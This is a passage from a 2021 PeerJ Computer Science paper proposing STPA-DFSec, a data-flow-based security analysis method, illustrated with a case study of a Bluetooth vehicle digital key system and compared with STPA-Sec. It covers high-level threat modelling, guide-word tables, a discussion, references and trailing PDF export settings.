algorithm, asymmetric key algorithm, message authentication code, digital signature, one-way hash function, and random number generation) (Schneier, 2003). Users can pick the enumerated functions to build their system FIS at a general level or refine the function in particular cases if detailed information is available. Other possible case-specific functions derived from the system descriptions can also be added to the structure. This function database can be extended and refined by the development team to make the database more practical for particular design domains. For example, the “transmit data to” function can be refined as “transmit data via CAN bus to” or “transmit data via WiFi to” if the communication channel between components is known at this design stage. Different communication media has different initial security vulnerabilities which can lead to further specific analysis. The “encrypt plain text by x” can be refined as “encrypt plain text by AES-128-CBC algorithm” or “encrypt plain text by AES-256-CBC Function Component BComponent A Algorithms Function Inputs Outputs Environment Function A-1 Function A-2 Function B-1 Function B-2 General FIS Figure 2 General FIS and its basic element “Function”. General functional interaction structure of the proposed approach and the details of its basic element (called “function”). Full-size DOI: 10.7717/peerj-cs.362/fig-2 Table 3 Enumerated common functions for FIS. Enumeration of commonly used functions in the functional interaction structure, including data process and communication functions and cryptography- related functions. Classes Functions Data process and communication functions process plain data; transmit data to; receive data from; validate received data (according to specifications, e.g., format and value range) Cryptography-related functions encrypt plain text by x; decrypt cipher text by x; calculate signature; validate signature; calculate MAC, validate MAC; other functions (e.g., key management related function, depends on available information) Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 9/21 http://dx.doi.org/10.7717/peerj-cs.362/fig-2 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ algorithm”. The execution time of these functions are different and should be considered when identifying timing-related losses. Therefore, by the refinement, analysts can further consider the security vulnerabilities related to the concrete function characteristics (e.g., transmission media or cryptographic algorithms) and obtain more specific outcomes finally. Note that when identifying functions and their interactions, analysts only need to focus on the system function aspect. Potential attributes of functions or interactions like the real-time capacity do not need to be considered in this step. Possible threats to the system security caused by such attributes will be addressed in later steps. For example, we do not consider the real-time performance when constructing an FIS. However, the insecure functional behavior related to the poor real-time capacity of a function or interaction will be identified by using the guide word “Being executed but exceeding the time limits causing vulnerabilities”. Step 3: Identify insecure function behaviors From the established FIS, Insecure Function Behaviors (IFB), which are behaviors that will lead to a system vulnerability in a particular context like a worst-case environment, can be identified with the help of guide words. Table 4 is the template for identifying IFBs with guide words (GW) adapted from the STPA Unsafe Control Action (UCA) ones. For identifying the “not being executed causes vulnerabilities” IFBs, it is helpful to consider if a function has the possibility of being bypassed or rejected but pretending to have been executed correctly. For identifying the “being executed causes vulnerability” IFBs, the possible weaknesses of the function execution conditions (e.g., inputs and execution context) are considered. As for the “being executed but exceeding time limits causes vulnerabilities” IFBs, whether the timeout will lead to the vulnerabilities is taken into account. How detailed an IFB is described depends on the information available. In any case, the analysis can be done with basic system information at a high system level. Step 4: Identify loss scenarios Finally, Loss Scenarios (LS), as possible causes of IFBs, are identified. The guide words for identifying LSs are proposed based on the basic elements of a function. Table 5 is the template for identifying LSs with two classes of guide words. The “Function itself” class helps to identify loss scenarios with causes from the function side, while the “Execution environment (Env)” class refers to loss scenarios caused by the external factors. Table 4 Template for identifying IFBs. Template for identifying insecure function behaviors with three guide words. Function (F) GW: Not being Executed Causes Vulnerabilities (NECV)1 GW: being Executed Causes Vulnerabilities (ECV)2 GW: being executed but Exceeding Time Limits causes vulnerabilities (ETL)3 S_Fn S_Fn_IFB_m 4 S_Fn_IFBm + 1 S_Fn_IFBm + 2 (e.g.) “Encrypt data” function Function is bypassed but returns a fake OK result. Data is encrypted by a forged key (provided by attacker). Data encryption violated the process time limit. Notes: 1 Adapted from the STPA UCA guide word “not providing causes hazard”. 2 Adapted from the STPA UCA guide word “providing causes hazard”. 3 Adapted from the STPA UCA guide words “too early, too late, out of order” and “stopped too soon, applied too long”. 4 S_Fn_IFBm is the IFB label, in which S represents the subject of the function. Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 10/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ Each loss scenario represents a system vulnerability that should be controlled by designers or operators. Detailed system constraints can also be derived from loss scenarios by inversing the conditions of loss scenarios or defining what the system must do in case the incident occurs. System constraints are inputs for further design phases. Summary Table 6 summarizes the process steps of both the STPA-DFSec and STPA-Sec with highlights of differences, in which “+” denotes added features of the STPA-DFSec and “*” represents modified steps in comparison with the original STPA-Sec. CASE STUDY Use case definition and assumption In this section, a Bluetooth digital key system of a vehicle is introduced as a toy example, which consists of three main physical components and aims to lock or unlock vehicle doors by a smartphone. Communication between different entities via wireless channels are protected by cryptographic mechanisms. The high-level sequence diagram of two main services, as the input of the analysis, is shown in Fig. 3 to describe how the Table 5 Template for identifying LSs. Template for identifying loss scenarios with five guide words. IFBs GW: Function Itself GW: Env- Function Inputs GW: Env- Calling Behaviors GW: Env- Computing Resources GW: Env- Links S_Fn_ IFBm S_Fn_ IFBm_LSp S_Fn_ IFBm_LSp + 1 S_Fn_ IFBm_LSp + 2 S_Fn_ IFBm_LSp + 3 S_Fn_ IFBm_LSp + 4 (e.g.) Encryption process violates the time limits Process algorithm is modified, which leads to the timeout Input size exceeds the limits but is not detected / Computing resource is occupied by others maliciously / (e.g.) Data leaks in the transmission No or inadequate anti- leakage mechanism is used / / / Transmission channel is monitored illegally Table 6 Summary of STPA-DFSec and STPA-Sec steps. Summary and comparison of STPA-DFSec and STPA-Sec approaches with differences marked. Basic four steps STPA-DFSec details STPA-Sec details Step 1: Define the purpose of the analysis Identify system-level losses, vulnerabilities, and constraints. Link vulnerabilities with corresponding losses and security attributes+. A general losses list is provided+ Identify system-level losses, vulnerabilities, and constraints Step 2: Model the system structure Model the system by functional interaction structure based on data flows*. A common function set for FIS is provided+ Model the system by functional control structure based on the control loop Step 3: Identify insecure items Use adapted guide words* (“not being executed”, “being executed” and “being executed but exceeding the time limits”) to identify insecure function behaviors Use guide words (“not providing”, “providing”, “too early, too late, out of order”, “stopped too soon, applied too long”) to identify insecure control actions Step 4: Identify loss scenarios Use adapted guide words* (“function itself”, “execution environment (incl. function inputs, calling behaviors, computing resources, and links)”) to identify loss scenarios Use guide words (“unsafe controller behavior”, “inadequate feedback and information”, “involving the control path”, “related to the controlled process”) to identify loss scenarios Notes: + Added features of the STPA-DFSec. * Modified steps in comparison with the original STPA-Sec. Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 11/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ system works. The asymmetric key algorithm is used in the communication with the cloud server, and the symmetric algorithm is used in the data transmission between the smartphone and the door controller. The research question in this case is: what are the security requirements of such an information-security-critical system? In this example, we assume that the connections between components have been established, but the connection is not ensured to be secure. The public and secret keys required for the cryptographic algorithms have been prepared in advance. In this research, we only focus on security issues, which means that the system can work properly without intended external disturbances and the system development errors and hardware random failures are out of the scope. Analysis by STPA-DFSec The STPA-DFSec analysis of the example system is presented in this section. lock or unlock doors user register or login User Smart Phone Cloud Server Door Controller register or login send register or login data verify and execute register or login based on the vehicle order recordsregister or login result register or login result lock or unlock doors request a session key with signature verify signature, generate a session key for the communication response the session key send lock or unlock command get and execute command get the result assign the session key get the session key Bluetooth WiFi WiFi Figure 3 Sequence diagram of the example system. Sequence diagram of two services of the example system, which are “user register or login” and “lock or unlock doors” services. Full-size DOI: 10.7717/peerj-cs.362/fig-3 Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 12/21 http://dx.doi.org/10.7717/peerj-cs.362/fig-3 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ In step 1, the system-level losses (L) are firstly identified according to the provided general losses list (Table 2) as well as the purpose and functionalities defined in the system specification. Then, vulnerabilities at the system level are considered. In this case, we use the C.I.A. security attributes (i.e., confidentiality, integrity, and availability) as the identification guide words to identify vulnerabilities in these three aspects. The related security attributes, together with the linked losses, are listed in the blankets after the vulnerability descriptions. Finally, we convert the vulnerabilities into system constraints by directly inversing the vulnerable situations and describing what should be done if the vulnerability exploits. All the mentioned system-level losses, vulnerabilities, and constraints are listed in Table 7. In step 2, the functional interaction structure is created based on the system data flows (shown in Fig. 4). We pick general functions in the proposed function database (Table 3), add some specific information related to this concrete system, and link them with data flow arrows based on the system sequence diagram (Fig. 3). In contrast to most traditional approaches, this analysis includes participants (user and manufacturer) outside the physical system boundary. Functions in a human or a manufacturer can also be refined into more detailed movements like “make a discussion”, “press a button”, or “manage the passwords”. Since we mainly focus on the physical part in this analysis, human movements are simplified as one “human operation” function. In step 3, insecure functional behaviors are identified by using the proposed guide words for each function. To increase the readability of this example case, the IFB labels of this demonstration are created in the form of “subjectName_Func%d_IFB%d” (%d represents a number). For example, the first identified IFB of a function is notated as “Phone_Func1_IFB1” (or “P_F1_IFB1” for short as presented in the template (Table 4)). Identified IFBs of an example function are shown in Table 8. In step 4, we consider the potential causes of previously obtained IFBs with the help of guide words and possible previous experience to identify loss scenarios of each IFB. Table 7 Losses, vulnerabilities, and constraints of the use case. Identified system-level losses, vulnerabilities, and constraints of the example case, with trace information in the bracket. L-1: Loss of physical property (incl. the vehicle and properties in it) L-2: Loss of non-physical property (incl. manufacturer’s reputation and intellectual property) V-1: Doors can be controlled by invalid users, which is not detected by valid users (e.g., A theft opens the door without being noticed.) [L-1/2, Integrity] V-2: Doors can not be controlled by valid users (e.g., Car owner can not lock the door when parking.) [L-2, Availability] V-3: Sensitive information (e.g., communication protocol and personal data) is leaked. [L-2, Confidentiality] SC-1: Doors should not be controlled by invalid users [V-1] SC-2: If doors are controlled by invalid users, it must be detected and recovered [V-1] SC-3: Doors should always be controlled by valid users [V-2] SC-4: If doors can not be controlled by valid users, it should be fixed within an acceptable period [V-2] SC-5: Sensitive information should be protected from leakage [V-3] SC-6: If sensitive information is leaked, it should be detected and reactions need to be taken to minimize losses [V-3] Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 13/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ Similarly, LS notations are created in the form of “subjectName_Func%d_IFB%d_LS%d” (%d represents a number). For example, “Phone_Func1_IFB1_LS1” (or “P_F1_IFB1_LS1” for short as presented in the template (Table 5)) is the notation of the first loss scenario of the IFB labeled “Phone_Func1_IFB1”. Examples of LSs related to IFBs in Table 8 are listed in Table 9. Analysis by STPA-Sec We also analyzed the example system by the STPA-Sec. Due to the same system model, the system-level losses, vulnerabilities, and constraints are the same as those in the STPA-DFSec analysis. Therefore, the work here starts with drawing the system control Table 8 Identified insecure function behavior examples. Identified insecure function behaviors of the example function “encrypt data by S’s public key”. Function GW: NECV GW: ECV GW: ETL Phone_ Func1 Phone_Func1_ IFB1 Phone_Func1_IFB2, Phone_Func1_IFB3 Phone_Func1_ IFB4 IFB Description: Phone_Func1: “encrypt data by S’s public key” function Phone_Func1_IFB1: Data is not encrypted, but the function is pretended to have been executed correctly [V-1/3] Phone_Func1_IFB2: Data is encrypted by a forged public key [V-1/3] Phone_Func1_IFB3: Data is encrypted with malicious algorithms [V-1/3] Phone_Func1_IFB4: Encryption process takes too long to violate the protocol time limits, which aborts the expected mission [V-2] Smartphone (P) Cloud Server (S) Door Controller (D) public key transmit data to S secret key decrypt by symm. session key public keypublic key secret keysignature transmit data to P public key secret key signature transmit data to S encrypt by symm. session key plain data process plain data process process plain data transmit data to D transmit data to D I/O signal Manufacturer (M) human operation User (U) human operation Figure 4 Functional interaction structure based on data flows. Functional interaction structure of the example case, including five system components and their data flow interactions. Full-size DOI: 10.7717/peerj-cs.362/fig-4 Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 14/21 http://dx.doi.org/10.7717/peerj-cs.362/fig-4 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ Table 9 Loss scenarios of IFBs. Identified loss scenarios of the listed IFBs in Table 8. IFBs GW: function itself GW: environment Phone_Func1_IFB1 / Phone_Func1_IFB1_LS1 Phone_Func1_IFB2 / Phone_Func1_IFB2_LS1 Phone_Func1_IFB3 Phone_Func1_IFB3_LS1 / Phone_Func1_IFB4 Phone_Func1_IFB4_LS1 Phone_Func1_IFB4_LS2, Phone_Func1_IFB4_LS3 LS Description: Phone_Func1_IFB1_LS1: Function is bypassed but returns a fake OK result Phone_Func1_IFB2_LS1: Valid key is replaced by a forged one Phone_Func1_IFB3_LS1: Algorithm is maliciously modified by the attacker Phone_Func1_IFB4_LS1: Algorithm is maliciously modified by the attacker, which requires more computing resource Phone_Func1_IFB4_LS2: Input length exceeds the limitation but is not detected Phone_Func1_IFB4_LS3: Computing resource is occupied by others maliciously Smartphone (P) Door Controller (D) output (un)lock signal(un)lock doors Cloud Server (S) register or login, request a session key register or login result, responsed session key assign a session key User (U) register, login, (un)lock doors register or login result Manufacturer (M) register register result register register result control actions feedback outputs execution feedback key assignment feedback Figure 5 Control structure of the system. Control structure of the example case, including five system components and their control loop interactions. Full-size DOI: 10.7717/peerj-cs.362/fig-5 Table 10 Identified insecure control actions. Identified insecure control actions of the example action “smartphone registers at the server”. Control action GW: not providing causes vulnerability GW: providing causes vulnerability GW: timing issues cause vulnerability1 Phone_CtrlAction1 Phone_CtrlAction1_ Insec1 Phone_CtrlAction1_ Insec2 / Label Description: Phone_CtrlAction1: Smartphone registers at the server (i.e., send account ID, password and smartphone’s public key to the server) Phone_CtrlAction1_Insec1: Smartphone does not register at the server correctly [V-2] Phone_CtrlAction1_Insec2: Register is done successfully, but sensitive information (account ID and password) is leaked [V-3] Note: 1 The guide word “timing issues cause vulnerability” represents “too early, too late, out of order” and “stopped too soon, applied too long” in the STPA-Sec. Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 15/21 http://dx.doi.org/10.7717/peerj-cs.362/fig-5 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ structure shown in Fig. 5, and then Insecure Control Actions (ICA) are identified. Examples of ICAs are shown in Table 10, in which the first letter of the label represents the control action’s controller. Finally, loss scenarios of each ICAs are identified. Examples of LSs are shown in Table 11. Outcome comparison Functions and control actions are basic elements in the STPA-DFSec and STPA-Sec respectively. Normally, a control action includes several functions to provide a service. For example, the control action Phone_CtrlAction1 (Smartphone registers at the server.) consists of several functions including “plain data process”, “transmit data to S” and “encrypt data by S’s public key” and so on. Therefore, the relationship between these two elements is that a sequence of the execution of functions forms a control action. To find out how both approaches work on the same use case, we mapped the analysis outcomes of both analyses. We found that a loss scenario identified by the STPA-Sec can be mapped to several STPA-DFSec loss scenarios. For example, the loss scenario Phone_CtrlAction1_Insec1_LS1 (Smartphone’s software is modified maliciously) can be mapped to Phone_Func1_IFB1_LS1 (Function is bypassed but returns a fake OK result.), Phone_Func1_IFB2_LS1 (Valid key is replaced by a forged one.), and Phone_Func1_IFB3_LS1 (Algorithm is maliciously modified by the attacker.), which are all possibilities of causing losses related to the smartphone’s software. In reverse, an STPA-DFSec loss scenario can be related to several STPA-Sec ones because different control actions between components always share the same transmission channels and data process units. No matter what the control action is “register”, “login” or “lock the door”, they all require the “process plain data”, “encrypt data by the key” and “transmit data” functions to perform the action. In conclusion, the STPA-Sec focuses more on the application aspect of the system and aims to ensure the control actions secure, while the STPA-DFSec views the system as a Table 11 Loss Scenarios of ICAs. Identified loss scenarios of the listed ICAs in Table 10. Insecure control action GW: controller GW: controller path GW: controlled process GW: feedback path Phone_CtrlAction1 _Insec1 Phone_CtrlAction1 _Insec1_LS1 Phone_CtrlAction1 _Insec1_LS2 Phone_CtrlAction1 _Insec1_LS3 Phone_CtrlAction1 _Insec1_LS4 Phone_CtrlAction1 _Insec2 Phone_CtrlAction1 _Insec2_LS1 Phone_CtrlAction1 _Insec2_LS2 Phone_CtrlAction1 _Insec2_LS3 / LS Description: Phone_CtrlAction1_Insec1_LS1: Smartphone’s software is modified maliciously Phone_CtrlAction1_Insec1_LS2: The control command is blocked on the path Phone_CtrlAction1_Insec1_LS3: Server’s software is modified maliciously Phone_CtrlAction1_Insec1_LS4: Register is done correctly but returns a NOK result Phone_CtrlAction1_Insec2_LS1: No data protection mechanism is used at the smartphone Phone_CtrlAction1_Insec2_LS2: Data is eavesdropped and decrypted at the path Phone_CtrlAction1_Insec2_LS3: No data protection mechanism is used at the server Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 16/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ data process machine. It focuses on the security of the data process and flows and does not care the application meaning of the data. DISCUSSION Finally, we discuss and conclude the differences and highlights of both approaches. The STPA-DFSec focuses on information flows and discusses possible vulnerabilities along the path of data flows, which helps to identify more detailed loss scenarios from the perspective of information flows. By contrast, the STPA-Sec can reveal more insecure details linked to concrete application scenarios since control actions are derived from the application aspect. The STPA-DFSec addresses in which data process unit a loss scenario occurs, while the STPA-Sec addresses in which application scenario a loss scenario occurs. To choose which approach to use depends on particular cases. Two principles can be used to help the decision. The first one is according to the system purpose. If the analyst focuses on the data process and transmission security, the STPA-DFSec is more suitable for the analysis from the data side. If providing proper and secure services is the main object, the STPA-Sec is applicable to identify insecure issues linking with application scenarios. The second principle is to consider who uses it. The STPA-DFSec is suitable for designers who are responsible for technical structure and design, while STPA-Sec is more useful for ones who design the system functionalities and make more high-level decisions. Note that the proposed approach does not rely on the known network vulnerabilities or attacks (e.g., eavesdropping and spoofing) since it is system-oriented and not threat- oriented. However, the known vulnerabilities can be used as clues when identifying system-level vulnerabilities in step 1. For example, “V-1” in Table 7 is actually a spoofing attack but does not use the word “spoofing” explicitly, and it is identified by the guide word “integrity”. The known vulnerabilities can be kept in mind in the whole analysis process and work as the secondary clues for identifying insecure behaviors or scenarios. However, the experience from previous projects is not necessary for our approach. For example, the loss scenario “Transmission channel is monitored illegally” in Table 5, which may be attributed to an eavesdropping attack or other Denial of Service (DoS) attacks, is identified by the proposed steps and guide words and not by the known eavesdropping or DoS attacks. Analysts can use their preferred ways to describe the system vulnerabilities or choose proper identification guide words in the analysis. The known system vulnerabilities or attack types can help the identification but are not necessary conditions. Two limitations of the STPA-DFSec have been identified. First, the STPA-based approaches lack the evaluation of identified scenarios. In practice, the resource for migrating insecure causes is limited. By evaluating and ranking the identified loss scenarios, the system designer can decide which insecure scenario should be avoided with high priority. To overcome this limitation, the STPA-based approaches can be used combining with other evaluation metrics (e.g., EVITA assessment method (Ruddle et al., 2009) and Common Vulnerability Scoring System (FIRST, 2015)) to assess the identified Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 17/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ insecure behaviors and scenarios. Second, the analyst should have corresponding information about the data processing of the target system (e.g., how data flows among components and what kind of data process function is contained). Otherwise, the functional interaction structure can not be constructed. In practice, system security engineering is not able to ensure absolute security but provides a sufficient base of evidence that supports claims that the expected level of trustworthiness has been achieved (Ross, McEvilley & Oren, 2016). The analysis in security engineering is also not able to be proven complete. The completeness of the analysis and how detailed the results are normally depend on the analyst’s knowledge and experience, design emphasis, and available system information. However, a proper systematic approach can help the analyst to be more confident in the analysis completeness (Young & Leveson, 2014). Proper guide words help to reduce the dependency on personal experience and subjective thinking and lead to relatively objective and valid results with less effort. The case study in this article represents the authors’ understanding of the example system and works as a demo to show how to use the proposed approach. CONCLUSION In this article, we have proposed a data-flow-based approach for security analysis of information-critical systems based on the STPA framework to overcome STPA-Sec’s limitations. The analyses of a vehicle digital key system by using both the STPA-DFSec and STPA-Sec have been presented as examples to show how to use the approaches. Finally, we compared the analysis results, presented the differences between both approaches and discussed highlights and drawbacks of the proposed STPA-DFSec. We have found that the proposed STPA-DFSec focuses on data flows and can reveal more details in information security aspects, which can not be addressed directly in the STPA-Sec analysis, while the STPA-Sec analyzes the system from the perspective of applications and concerns more safety-related security issues. Additionally, as an adaption of the STPA-Sec, the proposed STPA-DFSec, together with other STPA-based approaches, can be used to co-design complex systems in multi-disciplines under the unified STPA framework. Social aspects and human factors can also be included in the analysis, which are excluded from traditional analysis approaches. The proposed approach is not a substitution but a complement to the original approach. By using STPA-DFSec, we view the system from a new perspective (i.e., the data processing aspect) other than control loops and may find new points that are not directly identified by the STPA-Sec. Because of the relationship between the control action and the function in both approaches, the identified insecure items and loss scenarios can be mapped to each other, which helps to understand and design the system better. With the increasing connectivity and complexity of modern systems, more traditional safety-critical systems require information security to protect intellectual property or privacy nowadays (e.g., vehicles and healthcare devices). Based on the already-established system STAMP model of these systems, the proposed approach can be better integrated into the existing work and deal with the security aspect. Furthermore, compared to the existing approaches, the STPA-based ones are the better solutions that analyze the system Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 18/21 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ at a high strategy level, which provides a new point of the view for the security analysts to get possible new ideas or understanding of the target system. In the future, we will study more real-world cases and conduct experiments with different groups of analysts to evaluate and refine the proposed approach in practice. Furthermore, we will formalize the analysis process and design tools to achieve analysis results automatically for higher working efficiency. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the China Scholarship Council and funds of the German Federal Ministry of Education and Research under grant number 16KIS0995. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: German Federal Ministry of Education and Research: 16KIS0995. Competing Interests Stefan Wagner is an Academic Editor for PeerJ. Author Contributions � Jinghua Yu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Stefan Wagner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � Feng Luo conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data are available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.362#supplemental-information. REFERENCES Caralli RA, Stevens JF, Young LR, Wilson WR. 2007. Introducing octave allegro: improving the information security risk assessment process. Technical report, Carnegie-Mellon University. Available at https://resources.sei.cmu.edu/library/asset-view.cfm?assetid=8419. Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 19/21 http://dx.doi.org/10.7717/peerj-cs.362#supplemental-information http://dx.doi.org/10.7717/peerj-cs.362#supplemental-information http://dx.doi.org/10.7717/peerj-cs.362#supplemental-information https://resources.sei.cmu.edu/library/asset-view.cfm?assetid=8419 http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ Carter BT, Bakirtzis G, Elks CR, Fleming CH. 2018. A systems approach for eliciting mission- centric security requirements. In: 2018 Annual IEEE International Systems Conference (SysCon). Piscataway: IEEE, 1–8. Carter BT, Bakirtzis G, Elks CR, Fleming CH. 2019. Systems-theoretic security requirements modeling for cyber-physical systems. Systems Engineering 22(5):411–421 DOI 10.1002/sys.21504. ETSI. 2017. ETSI TS 102 165-1: Cyber methods and protocols. part 1: method and pro forma for threat, vulnerability, risk analysis (TVRA). Technical Specification. European Telecommunications Standards Institute. FIRST. 2015. Common vulnerability scoring system v. 3.0: specification document. Available at https://www.first.org/cvss/v3.0/specification-document. Friedberg I, McLaughlin K, Smith P, Laverty D, Sezer S. 2017. Stpa-safesec: safety and security analysis for cyber-physical systems. Journal of Information Security and Applications 34:183–196 DOI 10.1016/j.jisa.2016.05.008. ISO. 2018. Iso 26262-1 road vehicles—functional safety—part 1: vocabulary. Available at https://www.iso.org/standard/68383.html. Karatzas S, Chassiakos A. 2020. System-theoretic process analysis (stpa) for hazard analysis in complex systems: the case of “Demand-Side Management in a Smart Grid”. Systems 8(3):33 DOI 10.3390/systems8030033. Khan S, Madnick S, Moulton A. 2018. Cybersafety analysis of a central utilities plant (CUP) gas turbine using STPA-SEC. Available at https://pdfs.semanticscholar.org/fc05/c4e3a0eee3bf65 b1cbb1feb88e1106b16769.pdf?_ga=2.61852334.32626510.1610911489-436080280.1610911489. Leveson N, Thomas J. 2018. STPA Handbook. Available at https://psas.scripts.mit.edu/home/get_ file.php?name=STPA_handbook.pdf. Mailloux LO, Span M, Mills RF, Young W. 2019. A top down approach for eliciting systems security requirements for a notional autonomous space system. In: 2019 IEEE International Systems Conference (SysCon). Piscataway: IEEE, 1–7. Martin H, Bramberger R, Schmittner C, Ma Z, Gruber T, Ruiz A, Macher G. 2017. Safety and security co-engineering and argumentation framework. In: International Conference on Computer Safety, Reliability, and Security, Berlin: Springer, 286–297. Microsoft. 2009. The stride threat model. Available at https://docs.microsoft.com/en-us/previous- versions/commerce-server/ee823878(v=cs.20)?redirectedfrom=MSDN. NIST. 2018. Framework for improving critical infrastructure cybersecurity, version 1.1. Available at https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf. Olsson M. 2016. Healing vulnerabilities to enhance software security and safety. Technical report, Volvo Technology AB. Available at https://www.vinnova.se/globalassets/mikrosajter/ffi/ dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/2012-04625eng. pdf. Raspotnig C, Karpati P, Katta V. 2012. A combined process for elicitation and analysis of safety and security requirements. In: Bider I, Halpin T, Krogstie J, Nurcan S, Proper E, Schmidt R, Soffer P, Wrycza S, eds. Enterprise, Business-Process and Information Systems Modeling. Berlin: Springer, 347–361. Ross R, McEvilley M, Oren J. 2016. Nist special publication 800-160: systems security engineering considerations for a multidisciplinary approach in the engineering of trustworthy secure systems. Gaithersburg: National Institute of Standards and Technology. Ruddle A, Ward D, Weyl B, Idrees S, Roudier Y, Friedewald M, Leimbach T, Fuchs A, Gürgens S, Henniger O, Rieke R, Ritscher M, Broberg H, Apvrille L, Pacalet R, Pedroza G. 2009. Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 20/21 http://dx.doi.org/10.1002/sys.21504 https://www.first.org/cvss/v3.0/specification-document http://dx.doi.org/10.1016/j.jisa.2016.05.008 https://www.iso.org/standard/68383.html http://dx.doi.org/10.3390/systems8030033 https://pdfs.semanticscholar.org/fc05/c4e3a0eee3bf65b1cbb1feb88e1106b16769.pdf?_ga=2.61852334.32626510.1610911489-436080280.1610911489 https://pdfs.semanticscholar.org/fc05/c4e3a0eee3bf65b1cbb1feb88e1106b16769.pdf?_ga=2.61852334.32626510.1610911489-436080280.1610911489 https://psas.scripts.mit.edu/home/get_file.php?name=STPA_handbook.pdf https://psas.scripts.mit.edu/home/get_file.php?name=STPA_handbook.pdf https://docs.microsoft.com/en-us/previous-versions/commerce-server/ee823878(v=cs.20)?redirectedfrom=MSDN https://docs.microsoft.com/en-us/previous-versions/commerce-server/ee823878(v=cs.20)?redirectedfrom=MSDN https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf https://www.vinnova.se/globalassets/mikrosajter/ffi/dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/2012-04625eng.pdf https://www.vinnova.se/globalassets/mikrosajter/ffi/dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/2012-04625eng.pdf https://www.vinnova.se/globalassets/mikrosajter/ffi/dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/2012-04625eng.pdf http://dx.doi.org/10.7717/peerj-cs.362 https://peerj.com/computer-science/ Security requirements for automotive on-board networks based on dark-side scenarios. Available at https://zenodo.org/record/1188418. SAE. 2016. J3061: cybersecurity guidebook for cyber-physical vehicle systems. Available at https://www.sae.org/standards/content/j3061_201601/. Schmittner C, Gruber T, Puschner P, Schoitsch E. 2014. Security application of failure mode and effect analysis (fmea). In: International Conference on Computer Safety, Reliability, and Security, Berlin: Springer, 310–325. Schmittner C, Ma Z, Puschner P. 2016. Limitation and improvement of stpa-sec for safety and security co-analysis. In: International Conference on Computer Safety, Reliability, and Security, Berlin: Springer, 195–209. Schneier B. 2003. Secrets & lies: digital security in a networked world. Hoboken: John Wiley & Sons. Shapiro SS. 2016. Privacy risk analysis based on system control structures: adapting system- theoretic process analysis for privacy engineering. In: IEEE Security and Privacy Workshops (SPW), 22–26 May 2016, San Jose, CA, USA. Piscataway: IEEE, 17–24. Sidhu AS. 2018. Application of STPA-Sec for analyzing cybersecurity of autonomous mining systems. PhD thesis. Massachusetts Institute of Technology. Torkildson EN, Li J, Johnsen SO. 2019. Improving security and safety co-analysis of stpa. In: Proceedings of the 29th European Safety and Reliability Conference (ESREL), 22–26 September 2019, Hannover: Research Publishing Services. Wei LC, Madnick S. 2018. A system theoretic approach to cybersecurity risk analysis and mitigation for autonomous passenger vehicles. Cambridge: MIT Sloan School of Management. Young W, Leveson N. 2013. Systems thinking for safety and security. In: Proceedings of the 29th Annual Computer Security Applications Conference, New Orleans, Louisiana, USA, 1–8. Young W, Leveson N. 2014. Inside risks-an integrated approach to safety and security based on system theory: Applying a more powerful new safety methodology to security risks. Communications of the ACM 57(2):232–242 DOI 10.1145/2556938. Yu J, Luo F. 2020. A systematic approach for cybersecurity design of in-vehicle network systems with trade-off considerations. Security and Communication Networks 2020:7169720 DOI 10.1155/2020/7169720. Yu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.362 21/21 https://zenodo.org/record/1188418 https://www.sae.org/standards/content/j3061_201601/ http://dx.doi.org/10.1145/2556938 http://dx.doi.org/10.1155/2020/7169720 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.362 Data-flow-based adaption of the System-Theoretic Process Analysis for Security (STPA-Sec) Introduction Related work Methodology Case study Discussion Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages 